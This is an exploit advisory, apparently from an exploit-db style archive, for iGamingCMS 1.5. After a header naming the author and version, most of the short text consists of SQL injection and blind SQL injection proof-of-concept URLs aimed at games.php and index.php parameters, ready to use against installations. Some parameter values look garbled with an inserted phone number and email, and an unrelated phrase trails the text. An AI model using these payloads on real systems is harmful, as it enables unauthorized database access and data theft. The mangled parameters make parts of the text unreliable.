############################################################################ ## # Exploit Title: iGamingCMS1.5 multiple vulnirabilities# ## # Date: 27/08/2010 # ## # Author: Sweet# ## # Contact : charif38@hotmail.fr# ## # Software Link: http://www.igamingcms.com/# ## # Download: http://forums.igamingcms.com/forumdisplay.php?f=5# ## # Version:1.5# ## # Tested on: WinXp sp3 # ## # Risk : hight # ## ## # Description : iGaming CMS is a content management# # system designed for gaming websites. # ## ## ## ############################################################################ 1-SQL injection: http://www.example.com/igamingpath/games.php?order=1[SQLi]§ion=111-222-1933email@address.tst&sort=desc 2-Blind injection: http://www.example.com/igamingpath/games.php?order=title§ion=111-222-1933email@address.tst'+and+31337-31337='0&sort=desc http://www.example.com/igamingpath/index.php?do=viewarticle&id=1'+and+31337-31337='0 thx to Milw0rm.com , JF - Hamst0r - Keystroke, inj3ct0r.com , exploit-db.com Saha Ftourkoum et 1,2,3 viva L'Algerie :))
体验盒子
